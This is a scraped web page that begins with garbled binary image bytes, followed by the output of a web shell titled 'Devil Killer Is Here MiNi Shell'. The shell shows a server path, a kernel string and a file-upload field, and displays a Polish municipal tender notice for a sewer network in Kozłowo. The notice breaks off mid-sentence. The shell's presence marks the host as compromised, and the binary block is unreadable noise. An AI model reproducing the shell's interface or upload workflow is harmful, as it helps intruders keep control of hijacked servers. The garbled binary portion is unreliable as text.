JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210825/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210825/0016022901-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Budowa sieci kanalizacji sanitarnej w miejscowości Kozłowo” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA KOZŁOWO</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 510742994</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Mazurska 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kozłowo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">13-124</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL622 - Olsztyński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">896250833</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">896267502</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@kozlowo.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.kozlowo.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Budowa sieci kanalizacji sanitarnej w miejscowości Kozłowo” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e0aff696-059f-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00160229</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00003255/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.7 Budowa sieci kanalizacji sanitarnej w miejscowości Kozłowo</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt „Budowa sieci kanalizacji sanitarnej w miejscowości Kozłowo” dofinansowany ze środków Unii Europejskiej w ramach Programu Rozwoju Obszarów Wiejskich na lata 2014-2020 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/kozlowo <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/kozlowo</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane są elektronicznie za<br/>pośrednictwem platformazakupowa.pl (dalej jako „Platforma”) pod adresem:<br/>https://platformazakupowa.pl/pn/kozlowo i formularza „Wyślij wiadomość do zamawiającego”<br/>dostępnego na stronie dotyczącej danego postępowania (nie dotyczy składania ofert).<br/>2.	Korzystanie z platformy zakupowej przez Wykonawcę jest bezpłatne.<br/>3.	Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>a)	akceptuje warunki korzystania z Platformy, określone w Regulaminie zamieszczonym na stronie internetowej pod linkiem w zakładce „Regulamin" oraz uznaje go za wiążący.<br/>4.	Zamawiający, zgodnie z § 11 ust. 3 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów<br/>elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452), określa niezbędne wymagania sprzętowo- aplikacyjne umożliwiające pracę na Platformie, tj.:<br/>a)	stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b)	komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>c)	zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja<br/>10.0.,<br/>d)	włączona obsługa JavaScript,<br/>e)	zainstalowany program Adobe Acrobat Reader, lub inny obsługujący format plików .pdf,<br/>f)	Platforma działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8,<br/>g)	oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas<br/>(hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu<br/>Miar.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016 r., str. 1; zwanym dalej „RODO”), informuję, iż:<br/>Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016 r., str. 1; zwanym dalej „RODO”) informujemy, że:<br/>1.Administratorem Pani/Pana danych osobowych jest Wójt Gminy Kozłowo, ul. Mazurska 3, 13-124 Kozłowo.<br/>2.Administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod adresem e-mail: kontakt@odoonline.pl<br/>3.Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn. „Budowa sieci kanalizacji sanitarnej w miejscowości Kozłowo” prowadzonym w trybie podstawowym bez negocjacji;<br/>4.Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 ust. 1oraz art. 74 ust. 1 Ustawy;<br/>5.Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 Ustawy, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6.Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach Ustawy, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego - konsekwencje niepodania określonych danych wynikają z Ustawy;<br/>7.W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>A) posiada Pani/Pan:<br/>- na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>- na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>- na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>- prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>B)	nie przysługuje Pani/Panu:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/> 8) przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RGT.ZP.271.4.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 2079919,24 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 2. I część przedmiotu zamówienia dotyczy wykonania kanalizacji sanitarnej w zachodniej części wsi Kozłowo na działkach o numerach: <br/> 219/3, 220/1, 220/2, 221/7, 222/13, 208/1,415/2,160/1,160/2,159,206/3, 206/4, 205,415/3, 415/4, 588, 201/4, 201/5,201/7, 201/6, 201/8, 201/1, 202/3, 416/1, 166/9, 210/1, 199/2, 166/8, 166/12, 166/3, 167/1, 198/2, 171, 431, 172/5, 172/3, 196/1,196/2, 192/3, 192/2, 192/4, 192/5,191, 188/3, 200/7, 200/6, 211, 212,<br/>213, 214/3, 214/4, 158/7, 158/8, 158/3, 158/6, 157/3, 427, 155/1, 154/4, 154/5, 149/2, 151/4, 156, 516, 156/1, 510, 9, 8/2,8/1, 805, 743, 744,745, 748, 737, 749, 755, 751, 731, 5/2, 6/7, 6, 508/1 ,4, 443/2, 317/3, 317/5, 317/7, 317/8, 317/6, 61 , obręb 9 Kozłowo Gmina Kozłowo<br/><br/>Zakres prac obejmuje m.in.:<br/> Wykonanie kanalizacji sanitarnej grawitacyjnej z rur:<br/>- kanalizacyjnych kielichowych z PVC z litych klasy SN8 , o śr.160 mm, L= 850,00 m - kanalizacyjnych kielichowych z PVC z litych klasy SN8 , o śr.200 mm, L=2671,00 - przewiert starowany rurami PE śr. 160 mm(przewodowe), L= 32,00 m<br/>- Kanalizacji sanitarnej tłocznej z rur:<br/>- PE100, SDR 11 PN10, śr. 63mm, L= 816,00 m<br/>- PE100, SDR 11 PN10, śr. 75mm, L=125,00 m<br/>- PE100, SDR 11 PN10, śr. 90 mm, L= 427,00 m<br/>- przewiert starowany rurami PE śr. 90mm ( przewodowe) , L= 88,00m<br/>- przepompowanie przydomowe z komorą polietylenu o śr. 850 mm i głębokości 2,5 m z pompą o<br/>wydajności Qp= 1 dm3/s Hp=20 m, armaturą i orurowaniem ze stali nierdzewnej Dn 50 mm, pełnym<br/>wyposażeniem technologicznym i sterowaniem - 8 kpl.<br/>-	Przepompowania P1 konstrukcji komory z polimerobetonu śred. 1200 mm i wys. 3,70m, przykrycie w wykonaniu przejazdowym z włazem żeliwnym śr. 800 mm i z wentylacją dla strefy górnej i dolnej. Wyposażenie technologiczne przepompowni stanowią dwie pompy o wydajności q=3dm3/ sek. każda i wysokości podnoszenia H = 12 m, orurowanie ze stali kwasoodpornej , zasuwy miękkouszczelnione i zawory zwrotne kulowe. Sterowanie sterownicą wyposażoną w system zapobiegania gromadzenia osadów na dnie , sterownik z systemem zdalnego monitoringu SPR- GPRS , sterowanie poprzez sondę hydrostatyczną oraz dodatkowe dwa wyłączniki gruszkowe - 1 kpl.<br/>- Przepompownia P2 o konstrukcji komory z polimerobetonu śred. 1200mm i wys. 2,50m, przykrycie w wykonaniu przejezdnym z włazem żeliwnym śr. 800 mm z wentylacją dla strefy górnej i dolnej. Wyposażenie technologiczne przepompowni stanowią dwie pompy o wydajności q= 3dm3/sek. każda i wys. podnoszenia H=12m, orurowanie ze stali kwasoodpornej , zasuwy miękkouszczelnione i zawory zwrotne kulowe. Sterownie sterownicą wyposażoną w system zapobiegania gromadzenia osadów na dnie , sterownik z systemem zdalnego monitoringu SPR- GPRS , sterowanie poprzez sondę hydrostatyczną oraz dodatkową 2 wyłączniki gruszkowe. - 1 kpl.<br/>- Przepompowania P3 o konstrukcji komory z polimerobetonu śred. 1200mm i wys. 2,500m, przykrycie w wykonaniu przejazdowym z włazem żeliwnym śr. 800mm i z wentylacją dla strefy górnej i dolnej. Wyposażenie technologiczne przepompowni stanowią dwie pompy o wydajności q=3m3/sek. każda i wys. podnoszenia H= 12m, orurowanie ze stali kwasoodpornej, ze stali kwasoodpornej , zasuwy miękkouszczelnione i zawory zwrotne kulowe. Sterowanie sterownicą wyposażoną w system zapobiegania gromadzenia osadów na dnie , sterownik z systemem zdalnego monitoringu SPR-GPRS , sterowanie poprzez sondę hydrostatyczną oraz dodatkowo 2 wyłączniki gruszkowe. 1 kpl.<br/>Szczegółowo przedmiot zamówienia opisano w zał. 7 do SWZ ( Dokumentacja projektowa, Specyfikacja Techniczna oraz Przedmiar robót). </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 1841262,74 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45232410-9 - Roboty w zakresie kanalizacji ściekowej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <p class="mb-0">45233142-6 - Roboty w zakresie naprawy dróg</p> <p class="mb-0">45255600-5 - Roboty w zakresie kładzenia rur w kanalizacji</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">2.	Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami (osobno dla każdej części):<br/><br/>2.1.	Kryterium „cena” - wskaźnik C, ranga - 60%.<br/>Wskaźnik C obliczany jest wg wzoru:<br/>C = (C m / C b) x 100 pkt x 60%<br/>gdzie:<br/>C m - najniższa cena oferty, C b - cena oferty badanej<br/><br/>2.2.	Kryterium „gwarancja i rękojmia” - wskaźnik G, ranga - 40%.<br/><br/>2.2.1.	Zamawiający ustala minimalny wymagany termin udzielonej przez Wykonawcę gwarancji i rękojmi na wykonane roboty budowlane oraz użyte/dostarczone materiały na okres 36<br/>miesięcy, licząc od dnia bezusterkowego końcowego odbioru robót. Wykonawca może przedłużyć termin gwarancji i rękojmi na wykonane roboty budowlane oraz użyte/dostarczone materiały na okres maksymalnie 60 miesięcy, licząc od dnia bezusterkowego końcowego odbioru robót, z wyłączeniem zieleni, na którą Wykonawca udziela gwarancji i rękojmi na okres 12 miesięcy. Jeżeli Wykonawca udzieli gwarancji na okres dłuższy niż 60 miesięcy, Zamawiający obliczając ilość punktów w kryterium „gwarancja i rękojmia”, będzie traktował taki zapis tak, jak gdyby Wykonawca udzielił gwarancji i rękojmi na okres 60 miesięcy. Do umowy również zostanie wprowadzony termin gwarancji i rękojmi na wykonane roboty budowlane oraz użyte/dostarczone materiały na okres 60 miesięcy, licząc od dnia bezusterkowego końcowego odbioru robót (pomimo proponowanego w ofercie przez Wykonawcę dłuższego okresu gwarancji).<br/>2.2.2.	W przypadku, gdy Wykonawca nie poda żadnego okresu gwarancji w Formularzu oferty, Zamawiający przyjmie, że Wykonawca udziela gwarancji na okres 36 miesięcy.<br/>2.2.3.	Jeżeli Wykonawca w Formularzu oferty zaoferuje okres gwarancji krótszy, niż wymagane 36 miesięcy, Zamawiający odrzuci jego ofertę na podstawie art. 226 ust. 1 pkt 5 Ustawy.<br/><br/>Wskaźnik G obliczany jest wg wzoru:<br/>G = (G b / G m) x 100 pkt. x 40%<br/>gdzie:<br/>G b - ilość miesięcy udzielonej gwarancji i rękojmi w ofercie badanej,<br/>G m - największa ilość miesięcy udzielonej gwarancji i rękojmi w złożonych ofertach <br/>Wymagane jest podanie w ofercie okresu gwarancji w miesiącach.<br/><br/>3.	Końcowa ocena oferty to suma punktów uzyskanych za poszczególne kryteria wg wzoru:<br/>Lp = C + G<br/>gdzie:<br/>Lp - liczba punktów uzyskanych przez ofertę,<br/>C - liczba punktów uzyskanych w kryterium „cena”,<br/>G - liczba punktów uzyskanych w kryterium „gwarancja i rękojmia”.<br/>4.	Najkorzystniejsza oferta to oferta, która przedstawia najkorzystniejszy bilans ceny i innych kryteriów, czyli oferta, która uzyska najwyższą sumaryczną liczbę punktów (liczoną do dwóch miejsc po przecinku)<br/><br/><br/>2.1.	Kryterium „cena” - wskaźnik C, ranga - 60%.<br/>Wskaźnik C obliczany jest wg wzoru:<br/>C = (C m / C b) x 100 pkt x 60%<br/>gdzie:<br/>C m - najniższa cena oferty, C b - cena oferty badanej<br/><br/>2.2.	Kryterium „gwarancja i rękojmia” - wskaźnik G, ranga - 40%.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja i rękojmia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> II część przedmiotu zamówienia dotyczy wykonania kanalizacji sanitarnej- ul. Dolinka w Kozłowie na działkach o numerach: 588,234/10,234/9, 234/11, 234/4,234/3,234/2 , obręb 9 Kozłowo, Gmina Kozłowo.<br/><br/>Zakres prac obejmuje wykonanie m.in.:<br/>1.Kanalizacji sanitarnej grawitacyjna z rur:<br/>- kanalizacyjnych kielichowych z PVC litych klasy SN8, o śr. 160 mm, L= 97,00 m - kanalizacyjnych kielichowych ż PVC litych klasy SN8, o śr. 200 mm, L=118,00 m<br/>2.Kanalizacji sanitarnej tłocznej z rur:<br/>- PE100, SDR 11, PN 10, śr. 90mm, L= 126,00 m<br/>3.Przepompownia P4 o konstrukcji komory z polimerobetonu śred. 1200mm i wys.2.05m, przykrycie w wykonaniu przejezdnym z włazem żeliwnym śr. 800mm i z wentylacją dla strefy górnej i dolnej. Wyposażenie technologiczne przepompowni stanowią dwie pompy o wydajności q=3dm3/sek. każda i wys. podnoszenia H=12m, orurowanie ze stali kwasoodpornej, zasuwy miękkouszczelnione i zawory zwrotne kulowe. Sterowanie sterownicą wyposażoną w system zapobiegania gromadzenia osadów na dnie, sterownik z systemem zdalnego monitoringu SPR-GPRS, sterowanie poprzez sondę hydrostatyczną oraz dodatkowo 2 wyłączniki gruszkowe. - 1 kpl<br/><br/> 2.1.Szczegółowo przedmiot zamówienia opisano w zał. 7 do SWZ ( Dokumentacja projektowa, Specyfikacja Techniczna oraz Przedmiar robót). </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 238656,50 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45232410-9 - Roboty w zakresie kanalizacji 